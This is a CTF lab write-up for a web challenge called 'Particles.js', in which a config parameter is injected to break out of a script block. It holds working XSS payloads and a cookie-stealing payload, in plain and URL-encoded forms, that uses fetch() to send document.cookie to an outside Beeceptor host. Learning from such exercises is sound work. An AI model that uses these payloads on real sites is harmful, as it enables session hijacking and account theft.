Simple Web - 0x08(Lab - `Particles.js`)

Posted on | Post modified | In |

Simple Web - 0x08(Lab - Particles.js)

tags: CTF Web eductf

Challenge: https://particles.ctf.zoolab.org

Description

The website can change the theme of layout. The main goal is to leak admin’s cookie.

Source Code

Analysis

Exploit - XSS

  1. Use burp suit to check if the website has XSS vulnerability.
  2. Try to modify config parameter Payload 1: 1;alert(123);console.log({x://\ :::spoiler Response 1 
     ...
 <script>
     url.value = location; config.value = '1;
     alert(123);
     console.log({x://\'; fetch('/1;alert(123);console.log({x://\.json').then(r => r.json()).then(json => {
         particlesJS("particles-js", json)
     })
 </script>
 ...

    ::: or Payload 2: </script><script>alert(123);</script> :::spoiler Response 2

     ...
 <script>
 url.value = location; config.value = '
 </script>
 <script>
     alert(123);
 </script>
 '; fetch('/</script>
 <script>
     alert(123);
 </script>
 .json').then(r => r.json()).then(json => {
         particlesJS("particles-js", json)
     })
 </script>
 ...

    ::: or Payload 3: </script><script>alert(123);</script><script>console.log({x:// :::spoiler Response 3

     ...
 <script>
 url.value = location; config.value = '
 </script>
 <script>
     alert(123);
 </script>
 <script>
     console.log({x://'; fetch('/
 </script>
 <script>   
     alert(123);
 </script>
 <script>
     console.log({x://.json').then(r => r.json()).then(json => {
         particlesJS("particles-js", json)
     })
 </script>
 ...

    :::

  3. fetch + Beeceptor Payload: 
     </script><script>fetch(%22https://sbk6401.free.beeceptor.com?%22%2bdocument.cookie);</script>

    Note that: MUST TRANSFER + AND " TO %2B AND %22 RESPECTIVELY URL:

     https://particles.ctf.zoolab.org/?config=%3C/script%3E%3Cscript%3Efetch(%22https://sbkkk.free.beeceptor.com?%22%2bdocument.cookie);%3C/script%3E

  4. Report to author Must encoded by URL encode Payload: 
     https%3A%2F%2Fparticles.ctf.zoolab.org%2F%3Fconfig%3D%3C%2Fscript%3E%3Cscript%3Efetch%28%2522https%3A%2F%2Fsbkkk.free.beeceptor.com%3F%2522%252bdocument.cookie%29%3B%3C%2Fscript%3E

  • Other payload: :::spoiler payload Payload 2 
      url=https%3A%2F%2Fparticles.ctf.zoolab.org%2F%3Fconfig%3D%3C%2Fscript%3E%3Cscript%3Efetch%28%2522https%3A%2F%2Fsbk6401.free.beeceptor.com%3F%2522%252bdocument.cookie%29%3B%3C%2Fscript%3E%3Cscript%3Econsole.log%28%7Bx%3A%2F%2F

    Payload 3

      url=https%3A%2F%2Fparticles.ctf.zoolab.org%2F%3Fconfig%3D%3C%2Fscript%3E%3Cscript%3Efetch%28%2522https%3A%2F%2Fsbk6401.free.beeceptor.com%3F%2522%252bdocument.cookie%29%3B%3C%2Fscript%3E

    :::